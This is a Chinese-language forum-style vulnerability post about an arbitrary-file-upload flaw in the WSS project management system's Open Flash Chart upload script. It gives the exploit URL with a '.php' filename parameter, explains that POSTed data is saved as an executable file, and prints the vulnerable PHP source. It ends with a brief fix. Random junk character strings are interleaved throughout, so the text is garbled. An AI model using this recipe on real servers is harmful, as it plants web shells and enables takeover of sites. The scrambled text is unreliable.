WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
0 q& a6 y/ a% G 漏洞文件/chart/php-ofc-library/ofc_upload_image.php

; N% m: z9 r# s# [利用：
* j5 j/ B, t# Y$ v1 ?9 ~0 Y/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

Post任意数据
: r. \7 {- e7 k( {保存位置http://localhost/chart/tmp-upload-images/hfy.php
% u% K. D0 W% @. B; w: x- T/ U
0 l1 D2 o  c0 ?7 q+ F0 [9 H
" U9 M$ ~4 _5 w8 V7 D- h最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~
# Z! o  {) _  m4 u( V
5 ^, I; {2 E! m<?php

//
/ d5 M7 m' O; |// In Open Flash Chart -> save_image debug mode, you
, i( H: d% U. A# ?2 c/ |3 h! i$ k// will see the 'echo' text in a new window.
% _! n4 G4 j4 G+ H  n! a2 E//
4 G2 e' a0 \: Y$ [1 ?* r" o
/*
+ w/ B- x$ t& V) j3 n5 F' B1 ~( U4 f( O
  B5 H5 t; Y, f( j) V: i: E2 A+ x8 qprint_r( $_GET );
print_r( $_POST );
print_r( $_FILES );
4 W2 p3 m) U- X
print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
" V+ G% |+ C8 x" d* u9 Q
*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

& N& C* j+ d/ d( H7 u// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
) n% |3 d) ]2 |5 K// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
* B6 d& @3 W5 p0 R
//
// POST data is usually string data, but we are passing a RAW .png
3 {6 J; F" L5 H" y// so PHP is a bit confused and $_POST is empty. But it has saved
1 t5 N0 B% H1 a( j9 F/ K0 _// the raw bits into $HTTP_RAW_POST_DATA
//

: X) \1 B  V  j# @$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
. a+ i: m/ U2 W2 q$ J; \//
) j- ]+ _1 ?4 b( m) o- pexit();
$ K" n; E7 R8 y: z% n1 a7 \! |" R- _//
) Y% H/ d2 O6 e$ x1 S' B: \// PHP5:
" m' }9 T% M9 q$ J//

$ e* s) v$ {* k
// default path for the image to be stored //
0 m) B$ `! |5 }' e7 C. Z$default_path = 'tmp-upload-images/';

3 s. z  V! t: y9 C6 Vif (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
. e  E+ G! c* t$ Q
// move the image into the specified directory //
) Q2 ?; I" L; K. J, Q& rif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
" V4 Z. E! h2 i5 B- `# T    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
' J6 U  v, V) S} else {
* T/ j0 N; \: |8 J  C    echo "FILE UPLOAD FAILED";
; ^9 v6 T# c- a9 `& m4 d}
% z9 `9 A! i8 V  w$ e

9 F4 O/ o3 e5 }' m?>

& t2 U6 i5 i' `" I0 r
" V& o5 u4 O/ J) o/ y
- @; i6 B% L& h


1 t" \( d: u9 u* h修复方案：
这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞



; i/ H$ o4 J9 m+ ]0 N4 D2 _# @! o